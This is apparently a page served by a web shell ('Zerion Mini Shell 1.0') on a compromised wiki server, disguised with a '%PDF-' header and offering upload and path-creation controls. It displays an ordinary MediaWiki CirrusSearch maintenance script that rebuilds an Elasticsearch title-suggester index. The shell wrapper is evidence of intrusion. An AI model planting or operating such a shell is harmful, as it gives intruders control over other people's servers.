%PDF- %PDF-
Mini Shell

Mini Shell

Direktori : /www/varak.net/wiki.varak.net/extensions/CirrusSearch/maintenance/
Upload File :
Create Path :
Current File : /www/varak.net/wiki.varak.net/extensions/CirrusSearch/maintenance/updateSuggesterIndex.php

<?php

namespace CirrusSearch\Maintenance;

use CirrusSearch\Connection;
use CirrusSearch\DataSender;
use CirrusSearch\ElasticsearchIntermediary;
use CirrusSearch\Util;
use CirrusSearch\BuildDocument\SuggestBuilder;
use CirrusSearch\BuildDocument\SuggestScoringMethodFactory;
use CirrusSearch\BuildDocument\SuggestScoringMethod;
use CirrusSearch\Maintenance\Validators\AnalyzersValidator;
use CirrusSearch\SearchConfig;
use Elastica;
use Elastica\Index;
use Elastica\Query;
use Elastica\Request;
use Elastica\Status;
use MWElasticUtils;

/**
 * Update the search configuration on the search backend for the title
 * suggest index.
 *
 * This program is free software; you can redistribute it and/or modify
 * it under the terms of the GNU General Public License as published by
 * the Free Software Foundation; either version 2 of the License, or
 * (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License along
 * with this program; if not, write to the Free Software Foundation, Inc.,
 * 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
 * http://www.gnu.org/copyleft/gpl.html
 */

$IP = getenv( 'MW_INSTALL_PATH' );
if( $IP === false ) {
	$IP = __DIR__ . '/../../..';
}
require_once( "$IP/maintenance/Maintenance.php" );
require_once( __DIR__ . '/../includes/Maintenance/Maintenance.php' );

class UpdateSuggesterIndex extends Maintenance {
	/**
	 * @var string language code we're building for
	 */
	private $langCode;

	/**
	 * @var int
	 */
	private $indexChunkSize;

	/**
	 * @var int
	 */
	private $indexRetryAttempts;

	/**
	 * @var string
	 */
	private $indexTypeName;

	/**
	 * @var string
	 */
	private $indexBaseName;

	/**
	 * @var string
	 */
	private $indexIdentifier;

	/**
	 * @var string the score method name to use.
	 */
	private $scoreMethodName;

	/**
	 * @var SuggestScoringMethod the score function to use.
	 */
	private $scoreMethod;

	/**
	 * @var Index old suggester index that will be deleted at the end of the process
	 */
	private $oldIndex;

	/**
	 * @var int
	 */
	private $lastProgressPrinted;

	/**
	 * @var boolean optimize the index when done.
	 */
	private $optimizeIndex;

	/**
	 * @var array
	 */
	protected $maxShardsPerNode;

	/**
	 * @var array(String) list of available plugins
	 */
	private $availablePlugins;


	/**
	 * @var boolean index geo contextualized suggestions
	 */
	private $withGeo;

	/**
	 * @var string
	 */
	private $masterTimeout;

	/**
	 * @var ConfigUtils
	 */
	private $utils;

	/**
	 * @todo: public (used in closure)
	 * @var SuggestBuilder
	 */
	public $builder;

	/**
	 * @var AnalysisConfigBuilder
	 */
	private $analysisConfigBuilder;

	/**
	 * @var bool
	 */
	private $recycle = false;

	/**
	 * @var string[]
	 */
	private $bannedPlugins;

	public function __construct() {
		parent::__construct();
		$this->addDescription( "Create a new suggester index. Always operates on a single cluster." );
		$this->addOption( 'baseName', 'What basename to use for all indexes, ' .
			'defaults to wiki id', false, true );
		$this->addOption( 'indexChunkSize', 'Documents per shard to index in a batch.   ' .
		    'Note when changing the number of shards that the old shard size is used, not the new ' .
		    'one.  If you see many errors submitting documents in bulk but the automatic retry as ' .
		    'singles works then lower this number.  Defaults to 100.', false, true );
		$this->addOption( 'indexRetryAttempts', 'Number of times to back off and retry ' .
			'per failure.  Note that failures are not common but if Elasticsearch is in the process ' .
			'of moving a shard this can time out.  This will retry the attempt after some backoff ' .
			'rather than failing the whole reindex process.  Defaults to 5.', false, true );
		$this->addOption( 'optimize', 'Optimize the index to 1 segment. Defaults to false.', false, false );
		$this->addOption( 'with-geo', 'Build geo contextualized suggestions. Defaults to false.', false, false );
		$this->addOption( 'scoringMethod', 'The scoring method to use when computing suggestion weights. ' .
			'Defaults to $wgCirrusSearchCompletionDefaultScore or quality if unset.', false, true );
		$this->addOption( 'masterTimeout', 'The amount of time to wait for the master to respond to mapping ' .
			'updates before failing. Defaults to $wgCirrusSearchMasterTimeout.', false, true );
		$this->addOption( 'replicationTimeout', 'The amount of time (seconds) to wait for the replica shards to initialize. ' .
			'Defaults to 3600 seconds.', false, true );
		$this->addOption( 'allocationIncludeTag', 'Set index.routing.allocation.include.tag on the created index. ' .
			'Useful if you want to force the suggester index not to be allocated on a specific set of nodes.',
			false, true );
		$this->addOption( 'allocationExcludeTag', 'Set index.routing.allocation.exclude.tag on the created index. ' .
			'Useful if you want to force the suggester index not to be allocated on a specific set of nodes.',
			false, true );
	}

	public function execute() {
		global $wgLanguageCode,
			$wgCirrusSearchBannedPlugins,
			$wgCirrusSearchMasterTimeout,
			$wgCirrusSearchMaxShardsPerNode,
			$wgCirrusSearchCompletionDefaultScore;

		$this->disablePoolCountersAndLogging();
		$this->masterTimeout = $this->getOption( 'masterTimeout', $wgCirrusSearchMasterTimeout );
		$this->indexTypeName = Connection::TITLE_SUGGEST_TYPE;

		// Check that all shards and replicas settings are set
		try {
			$this->getShardCount();
			$this->getReplicaCount();
		} catch( \Exception $e ) {
			$this->error( "Failed to get shard count and replica count information: {$e->getMessage()}", 1 );
		}

		$this->indexBaseName = $this->getOption( 'baseName', $this->getSearchConfig()->get( SearchConfig::INDEX_BASE_NAME ) );
		$this->indexChunkSize = $this->getOption( 'indexChunkSize', 100 );
		$this->indexRetryAttempts = $this->getOption( 'reindexRetryAttempts', 5 );

		$this->optimizeIndex = $this->getOption( 'optimize', false );
		$this->withGeo = $this->getOption( 'with-geo', false );

		$this->utils = new ConfigUtils( $this->getClient(), $this);

		$this->langCode = $wgLanguageCode;
		$this->bannedPlugins = $wgCirrusSearchBannedPlugins;

		$this->availablePlugins = $this->utils->scanAvailablePlugins( $this->bannedPlugins );
		$this->analysisConfigBuilder = $this->pickAnalyzer( $this->langCode, $this->availablePlugins );

		$this->utils->checkElasticsearchVersion();

		$this->maxShardsPerNode = isset( $wgCirrusSearchMaxShardsPerNode[ $this->indexTypeName ] ) ? $wgCirrusSearchMaxShardsPerNode[ $this->indexTypeName ] : 'unlimited';

		$this->scoreMethodName = $this->getOption( 'scoringMethod', $wgCirrusSearchCompletionDefaultScore );
		$this->scoreMethod = SuggestScoringMethodFactory::getScoringMethod( $this->scoreMethodName );
		$this->builder = new SuggestBuilder( $this->scoreMethod, $this->withGeo );

		try {
			// If the version does not exist it's certainly because nothing has been indexed.
			if ( !MetaStoreIndex::cirrusReady( $this->getConnection() ) ) {
				throw new \Exception("Cirrus meta sotre does not exist, you must index your data first");
			}

			if ( !$this->canWrite() ) {
				$this->error( 'Index/Cluster is frozen. Giving up.', 1 );
			}

			# check for broken indices and delete them
			$this->checkAndDeleteBrokenIndices();

			if ( !$this->canRecycle() ) {
				$this->rebuild();
			} else {
				$this->recycle();
			}
		} catch ( \Elastica\Exception\Connection\HttpException $e ) {
			$message = $e->getMessage();
			$this->log( "\nUnexpected Elasticsearch failure.\n" );
			$this->error( "Http error communicating with Elasticsearch:  $message.\n", 1 );
		} catch ( \Elastica\Exception\ExceptionInterface $e ) {
			$type = get_class( $e );
			$message = ElasticsearchIntermediary::extractMessage( $e );
			/** @suppress PhanUndeclaredMethod ExceptionInterface has no methods */
			$trace = $e->getTraceAsString();
			$this->log( "\nUnexpected Elasticsearch failure.\n" );
			$this->error( "Elasticsearch failed in an unexpected way.  This is always a bug in CirrusSearch.\n" .
				"Error type: $type\n" .
				"Message: $message\n" .
				"Trace:\n" . $trace, 1 );
		}
	}

	/**
	 * Check the frozen indices
	 * @return true if the cluster/index is not frozen, false otherwise.
	 */
	private function canWrite() {
		// Reuse DataSender even if we don't send anything with it.
		$sender = new DataSender( $this->getConnection(), $this->getSearchConfig() );
		return $sender->areIndexesAvailableForWrites( [ $this->getIndexTypeName() ] );
	}

	/**
	 * Check for duplicate indices that may have been created
	 * by a previous update that failed.
	 */
	private function checkAndDeleteBrokenIndices() {
		$indices = $this->utils->getAllIndicesByType( $this->getIndexTypeName() );
		if ( count( $indices ) < 2 ) {
			return;
		}
		$indexByName = [];
		foreach( $indices as $name ) {
			$indexByName[$name] = $this->getConnection()->getIndex( $name );
		}

		$status = new Status($this->getClient());
		foreach ( $status->getIndicesWithAlias( $this->getIndexTypeName() ) as $aliased ) {
			// do not try to delete indices that are used in aliases
			unset( $indexByName[$aliased->getName()] );
		}
		foreach ( $indexByName as $name => $index ) {
			# double check with stats
			$stats = $index->getStats()->getData();
			// Extra check: if stats report usages we should not try to fix things
			// automatically.
			if ( $stats['_all']['total']['suggest']['total'] == 0 ) {
				$this->log( "Deleting broken index {$index->getName()}\n" );
				$this->deleteIndex( $index );
			} else {
				$this->log( "Broken index {$index->getName()} appears to be in use, please check and delete.\n" );
			}

		}
		# If something went wrong the process will fail when calling pickIndexIdentifierFromOption
	}

	private function rebuild() {
		$oldIndexIdentifier = $this->utils->pickIndexIdentifierFromOption( 'current', $this->getIndexTypeName() );
		$this->oldIndex = $this->getConnection()->getIndex( $this->indexBaseName, $this->indexTypeName, $oldIndexIdentifier );
		$this->indexIdentifier = $this->utils->pickIndexIdentifierFromOption( 'now', $this->getIndexTypeName() );

		$this->createIndex();
		$this->indexData();
		if ( $this->optimizeIndex ) {
			$this->optimize();
		}
		$this->enableReplicas();
		$this->getIndex()->refresh();
		$this->validateAlias();
		$this->updateVersions();
		$this->deleteOldIndex();
		$this->log("Done.\n");
	}

	private function canRecycle() {
		global $wgCirrusSearchRecycleCompletionSuggesterIndex;
		if ( !$wgCirrusSearchRecycleCompletionSuggesterIndex ) {
			return false;
		}
		$oldIndexIdentifier = $this->utils->pickIndexIdentifierFromOption( 'current', $this->getIndexTypeName() );
		$oldIndex = $this->getConnection()->getIndex( $this->indexBaseName, $this->indexTypeName, $oldIndexIdentifier );
		if ( ! $oldIndex->exists() ) {
			$this->error( 'Index does not exist yet cannot recycle.' );
			return false;
		}
		$refresh = $oldIndex->getSettings()->getRefreshInterval();
		if ( $refresh != '-1' ) {
			$this->error( 'Refresh interval is not -1, cannot recycle.' );
			return false;
		}

		$shards = $oldIndex->getSettings()->get( 'number_of_shards' );
		// We check only the number of shards since it cannot be updated.
		if( $shards != $this->getShardCount() ) {
			$this->error( 'Number of shards mismatch cannot recycle.' );
			return false;
		}

		list( $mMaj ) = explode( '.', \CirrusSearch\Maintenance\SuggesterMappingConfigBuilder::VERSION );
		list( $aMaj ) = explode( '.', \CirrusSearch\Maintenance\SuggesterAnalysisConfigBuilder::VERSION );

		try {
			$versionDoc = MetaStoreIndex::getVersionType( $this->getConnection() )->getDocument( $this->getIndexTypeName() );
		} catch( \Elastica\Exception\NotFoundException $nfe ) {
			$this->error( 'Index missing in mw_cirrus_metastore::version, cannot recycle.' );
			return false;
		}

		if ( $versionDoc->analysis_maj != $aMaj ) {
			$this->error( 'Analysis config version mismatch, cannot recycle.' );
			return false;
		}

		if ( $versionDoc->mapping_maj != $mMaj ) {
			$this->error( 'Mapping config version mismatch, cannot recycle.' );
			return false;
		}

		$validator = new AnalyzersValidator( $oldIndex, $this->analysisConfigBuilder, $this );
		$status = $validator->validate();
		if ( !$status->isOK() ) {
			$this->error( 'Analysis config differs, cannot recycle.' );
			return false;
		}

		return true;
	}

	/**
	 * Recycle a suggester index:
	 * 1/ index data (delete docs if it already exists)
	 * 2/ expunge deleted docs
	 * 3/ refresh the reader
	 *    - so we can run a quick delete on remaining docs
	 *      (the docs that were actually deleted)
	 *    - drawbacks we load the FST from an un-optimized index
	 * 4/ delete old docs
	 * 5/ optimize
	 * 6/ refresh the reader
	 *
	 * Drawbacks: the FST will be read from disk twice in a short
	 * amount of time.
	 * This is a trade off between cluster operation and disk operation.
	 * Recreating the index may require less disk operations but causes
	 * the cluster to rebalance.
	 * This is certainly the best strategy for small indices (less than 100k docs)
	 * but needs to be carefully tested on bigger indices with high QPS.
	 */
	private function recycle() {
		$this->log( "Recycling index {$this->getIndex()->getName()}\n");
		$this->recycle = true;
		$this->indexData();
		// This is fragile... hopefully most of the docs will be deleted from the old segments
		// and will result in a fast operation.
		// New segments should not be affected.
		// Unfortunately if a failure causes the process to stop
		// the FST will maybe contains duplicates as it cannot (elastic 1.7)
		// filter deleted docs. We will rely on output deduplication
		// but this will certainly affect performances.

		$this->expungeDeletes();
		// Refresh the reader so we can scroll over remaining docs.
		// At this point we may read the new un-optimized FST segments
		// Old ones should be pretty small after expungeDeletes
		$this->getIndex()->refresh();

		$boolNot = new Elastica\Query\BoolQuery();
		$boolNot->addMustNot(
			new Elastica\Query\Term( [ "batch_id" => $this->builder->getBatchId() ] )
		);
		$bool = new Elastica\Query\BoolQuery();
		$bool->addFilter( $boolNot );

		$query = new Elastica\Query();
		$query->setQuery( $bool );
		$query->setFields( [ '_id' ] );

		$scrollOptions = [
			'search_type' => 'scan',
			'scroll' => "15m",
			'size' => $this->indexChunkSize
		];
		$result = $this->getIndex()->search( $query, $scrollOptions );

		$totalDocsInIndex = $result->getResponse()->getData();
		$totalDocsInIndex = $totalDocsInIndex['hits']['total'];
		$totalDocsToDump = $totalDocsInIndex;

		$this->log( "Deleting remaining docs from previous batch ($totalDocsInIndex).\n" );
		MWElasticUtils::iterateOverScroll( $this->getIndex(), $result->getResponse()->getScrollId(), '15m',
			function( $results ) use ( &$docsDumped, $totalDocsToDump ) {
				$docIds = [];
				foreach( $results as $result ) {
					$docsDumped++;
					$docIds[] = $result->getId();
				}
				$this->outputProgress( $docsDumped, $totalDocsToDump );
				MWElasticUtils::withRetry( $this->indexRetryAttempts,
					function() use ( $docIds ) {
						$this->getType()->deleteIds( $docIds );
					}
				);
			}, 0, $this->indexRetryAttempts );
		$this->log( "Done.\n" );
		// Old docs should be deleted now we can optimize and flush
		$this->optimize();

		// @todo add support for changing the number of replicas
		// if the setting was changed in cirrus config.
		// Workaround is to change the settings directly on the cluster.

		// Refresh the reader so it now uses the optimized FST,
		// and actually free and delete old segments.
		$this->getIndex()->refresh();
	}

	private function deleteOldIndex() {
		if ( $this->oldIndex && $this->oldIndex->exists() ) {
			$this->log("Deleting " . $this->oldIndex->getName() . " ... ");
			// @todo Utilize $this->oldIndex->delete(...) once Elastica library is updated
			// to allow passing the master_timeout
			$this->oldIndex->request(
				'',
				Request::DELETE,
				[],
				[ 'master_timeout' => $this->masterTimeout ]
			);
			$this->output("ok.\n");
		}
	}

	/**
	 * Delete an index
	 * @param \Elastica\Index $index
	 */
	private function deleteIndex( \Elastica\Index $index ) {
		// @todo Utilize $this->oldIndex->delete(...) once Elastica library is updated
		// to allow passing the master_timeout
		$index->request(
			'',
			Request::DELETE,
			[],
			[ 'master_timeout' => $this->masterTimeout ]
		);
	}

	private function optimize() {
		$this->log("Optimizing index...");
		$this->getIndex()->optimize( [ 'max_num_segments' => 1 ] );
		$this->output("ok.\n");
	}

	private function expungeDeletes() {
		$this->log("Purging deleted docs...");
		$this->getIndex()->optimize( [ 'only_expunge_deletes' => true, 'flush' => false ] );
		$this->output("ok.\n");
	}

	private function indexData() {
		// We build the suggestions by reading CONTENT and GENERAL indices.
		// This does not support extra indices like FILES on commons.
		$sourceIndexTypes = [ Connection::CONTENT_INDEX_TYPE, Connection::GENERAL_INDEX_TYPE ];

		// Indices to use for counting max_docs used by scoring functions
		// Since we work mostly on the content namespace it seems OK to count
		// only docs in the CONTENT index.
		$countIndices = [ Connection::CONTENT_INDEX_TYPE ];

		$query = new Query();
		$query->setFields( [ '_id', '_type', '_source' ] );
		$query->setSource( [
			'include' => $this->builder->getRequiredFields()
		] );

		$pageAndNs = new Elastica\Query\BoolQuery();
		$pageAndNs->addShould( new Elastica\Query\Term( [ "namespace" => NS_MAIN ] ) );
		$pageAndNs->addShould( new Elastica\Query\Term( [ "redirect.namespace" => NS_MAIN ] ) );
		$pageAndNs->addMust( new Elastica\Query\Type( Connection::PAGE_TYPE_NAME ) );
		$bool = new Elastica\Query\BoolQuery();
		$bool->addFilter( $pageAndNs );

		$query->setQuery( $bool );

		// Run a first query to count the number of docs.
		// This is needed for the scoring methods that need
		// to normalize values against wiki size.
		$mSearch = new \Elastica\Multi\Search( $this->getClient() );
		foreach ( $countIndices as $sourceIndexType ) {
			$search = new \Elastica\Search( $this->getClient() );
			$search->addIndex( $this->getConnection()->getIndex( $this->indexBaseName, $sourceIndexType ) );
			$search->setOption( \Elastica\Search::OPTION_SEARCH_TYPE, \Elastica\Search::OPTION_SEARCH_TYPE_COUNT );
			$mSearch->addSearch( $search );
		}

		$mSearchRes = $mSearch->search();
		$total = 0;
		foreach( $mSearchRes as $res ) {
			$total += $res->getTotalHits();
		}
		$this->log( "Setting max_docs to $total\n" );
		$this->scoreMethod->setMaxDocs( $total );

		foreach( $sourceIndexTypes as $sourceIndexType ) {
			$scrollOptions = [
				'search_type' => 'scan',
				'scroll' => "15m",
				'size' => $this->indexChunkSize
			];

			$sourceIndex = $this->getConnection()->getIndex( $this->indexBaseName, $sourceIndexType );
			$result = $sourceIndex->search( $query, $scrollOptions );
			$totalDocsInIndex = $result->getResponse()->getData();
			$totalDocsInIndex = $totalDocsInIndex['hits']['total'];
			$totalDocsToDump = $totalDocsInIndex;

			$docsDumped = 0;
			$this->log( "Indexing $totalDocsToDump documents from $sourceIndexType ($totalDocsInIndex in the index) with batchId: {$this->builder->getBatchId()} and scoring method: {$this->scoreMethodName}\n" );

			$destinationType = $this->getIndex()->getType( Connection::TITLE_SUGGEST_TYPE_NAME );

			MWElasticUtils::iterateOverScroll( $sourceIndex, $result->getResponse()->getScrollId(), '15m',
				function( $results ) use ( &$docsDumped, $totalDocsToDump,
						$destinationType ) {
					$inputDocs = [];
					foreach ( $results as $result ) {
						$docsDumped++;
						$inputDocs[] = [
							'id' => $result->getId(),
							'source' => $result->getSource()
						];
					}

					$suggestDocs = $this->builder->build( $inputDocs );
					$this->outputProgress( $docsDumped, $totalDocsToDump );
					MWElasticUtils::withRetry( $this->indexRetryAttempts,
						function() use ( $destinationType, $suggestDocs ) {
							$destinationType->addDocuments( $suggestDocs );
						}
					);
				}, 0, $this->indexRetryAttempts );
			$this->log( "Indexing from $sourceIndexType index done.\n" );
		}
	}

	public function validateAlias() {
		// @todo utilize the following once Elastica is updated to support passing
		// master_timeout. This is a copy of the Elastica\Index::addAlias() method
		// $this->getIndex()->addAlias( $this->getIndexTypeName(), true );
		$index = $this->getIndex();
		$name = $this->getIndexTypeName();

		$path = '_aliases';
		$data = ['actions' => []];
		$status = new Status($index->getClient());
		foreach ($status->getIndicesWithAlias($name) as $aliased) {
			$data['actions'][] = ['remove' => ['index' => $aliased->getName(), 'alias' => $name]];
		}

		$data['actions'][] = ['add' => ['index' => $index->getName(), 'alias' => $name]];

		$index->getClient()->request($path, Request::POST, $data, [ 'master_timeout' => $this->masterTimeout ] );
	}

	/**
	 * public because php 5.3 does not support accessing private
	 * methods in a closure.
	 * @param int $docsDumped
	 * @param int $limit
	 */
	public function outputProgress( $docsDumped, $limit ) {
		if ( $docsDumped <= 0 ) {
			return;
		}
		$pctDone = (int) ( ( $docsDumped / $limit ) * 100 );
		if ( $this->lastProgressPrinted == $pctDone ) {
			return;
		}
		$this->lastProgressPrinted = $pctDone;
		if ( ( $pctDone % 2 ) == 0 ) {
			$this->outputIndented( "\t$pctDone% done...\n" );
		}
	}

	public function log( $message, $channel = NULL ) {
		$date = new \DateTime();
		parent::output( $date->format('Y-m-d H:i:s') . " " . $message, $channel );
	}

	/**
	 * @param string $langCode
	 * @param array $availablePlugins
	 * @return AnalysisConfigBuilder
	 */
	private function pickAnalyzer( $langCode, array $availablePlugins = [] ) {
		$analysisConfigBuilder = new \CirrusSearch\Maintenance\SuggesterAnalysisConfigBuilder( $langCode, $availablePlugins );
		$this->outputIndented( 'Picking analyzer...' .
			$analysisConfigBuilder->getDefaultTextAnalyzerType() . "\n" );
		return $analysisConfigBuilder;
	}

	private function createIndex() {
		$maxShardsPerNode = $this->maxShardsPerNode === 'unlimited' ? -1 : $this->maxShardsPerNode;
		// This is "create only" for now.
		if ( $this->getIndex()->exists() ) {
			throw new \Exception( "Index already exists." );
		}

		$mappingConfigBuilder = new SuggesterMappingConfigBuilder();

		// We create the index with 0 replicas, this is faster and will
		// stress less nodes with 4 shards and 2 replicas we would
		// stress 12 nodes (moreover with the optimize flag)
		$settings = [
			'number_of_shards' => $this->getShardCount(),
			// hacky but we still use auto_expand_replicas
			// for convenience on small install.
			'auto_expand_replicas' => "0-0",
			'refresh_interval' => -1,
			'analysis' => $this->analysisConfigBuilder->buildConfig(),
			'routing.allocation.total_shards_per_node' => $maxShardsPerNode,
		];

		if ( $this->hasOption( 'allocationIncludeTag' ) ) {
			$this->output( "Using routing.allocation.include.tag: {$this->getOption( 'allocationIncludeTag' )}, " .
				"the index might be stuck in red if the cluster is not properly configured.\n" );
			$settings['routing.allocation.include.tag'] = $this->getOption( 'allocationIncludeTag' );
		}

		if ( $this->hasOption( 'allocationExcludeTag' ) ) {
			$this->output( "Using routing.allocation.exclude.tag: {$this->getOption( 'allocationExcludeTag' )}, " .
				"the index might be stuck in red if the cluster is not properly configured.\n" );
			$settings['routing.allocation.exclude.tag'] = $this->getOption( 'allocationExcludeTag' );
		}

		$args = [
			'settings' => $settings,
			'mappings' => $mappingConfigBuilder->buildConfig()
		];
		// @todo utilize $this->getIndex()->create(...) once it supports setting
		// the master_timeout parameter.
		$this->getIndex()->request(
			'',
			Request::PUT,
			$args,
			[ 'master_timeout' => $this->masterTimeout ]
		);

		// Index create is async, we have to make sure that the index is ready
		// before sending any docs to it.
		$this->waitForGreen();
	}

	private function enableReplicas() {
		$this->log("Enabling replicas...\n");
		$args = [
			'index' => [
				'auto_expand_replicas' => $this->getReplicaCount(),
			],
		];

		$path = $this->getIndex()->getName() . "/_settings";
		$this->getIndex()->getClient()->request(
			$path,
			Request::PUT,
			$args,
			[ 'master_timeout' => $this->masterTimeout ]
		);

		// The previous call seems to be async, let's wait few sec
		// otherwise replication won't have time to start.
		sleep( 20 );

		// Index will be yellow while replica shards are being allocated.
		$this->waitForGreen( $this->getOption( 'replicationTimeout', 3600 ) );
	}

	private function waitForGreen( $timeout = 600 ) {
		$this->log( "Waiting for the index to go green...\n" );
		// Wait for the index to go green ( default 10 min)
		if ( !$this->utils->waitForGreen( $this->getIndex()->getName(), $timeout ) ) {
			$this->error( "Failed to wait for green... please check config and delete the {$this->getIndex()->getName()} index if it was created.", 1 );
		}
	}

	/**
	 * @return string Number of replicas this index should have. May be a range such as '0-2'
	 */
	private function getReplicaCount() {
		return $this->getConnection()->getSettings()->getReplicaCount( $this->indexTypeName );
	}

	private function getShardCount() {
		return $this->getConnection()->getSettings()->getShardCount( $this->indexTypeName );
	}

	private function updateVersions() {
		$this->log( "Updating tracking indexes..." );
		$index = MetaStoreIndex::getVersionType( $this->getConnection() );
		if ( !$index->exists() ) {
			throw new \Exception("meta store does not exist, you must index your data first");
		}
		list( $aMaj, $aMin ) = explode( '.', \CirrusSearch\Maintenance\SuggesterAnalysisConfigBuilder::VERSION );
		list( $mMaj, $mMin ) = explode( '.', \CirrusSearch\Maintenance\SuggesterMappingConfigBuilder::VERSION );
		$doc = new \Elastica\Document(
			$this->getIndexTypeName(),
			[
				'analysis_maj' => $aMaj,
				'analysis_min' => $aMin,
				'mapping_maj' => $mMaj,
				'mapping_min' => $mMin,
				'shard_count' => $this->getShardCount(),
			]
		);
		$index->addDocument( $doc );
		$this->output("ok.\n");
	}

	/**
	 * @return \Elastica\Index being updated
	 */
	public function getIndex() {
		return $this->getConnection()->getIndex( $this->indexBaseName, $this->indexTypeName, $this->indexIdentifier );
	}

	/**
	 * @return \Elastica\Type
	 */
	public function getType() {
		return $this->getIndex()->getType( Connection::TITLE_SUGGEST_TYPE_NAME );
	}

	/**
	 * @return Elastica\Client
	 */
	protected function getClient() {
		return $this->getConnection()->getClient();
	}

	/**
	 * @return string name of the index type being updated
	 */
	protected function getIndexTypeName() {
		return $this->getConnection()->getIndexName( $this->indexBaseName, $this->indexTypeName );
	}
}

$maintClass = UpdateSuggesterIndex::class;
require_once RUN_MAINTENANCE_IF_MAIN;

Zerion Mini Shell 1.0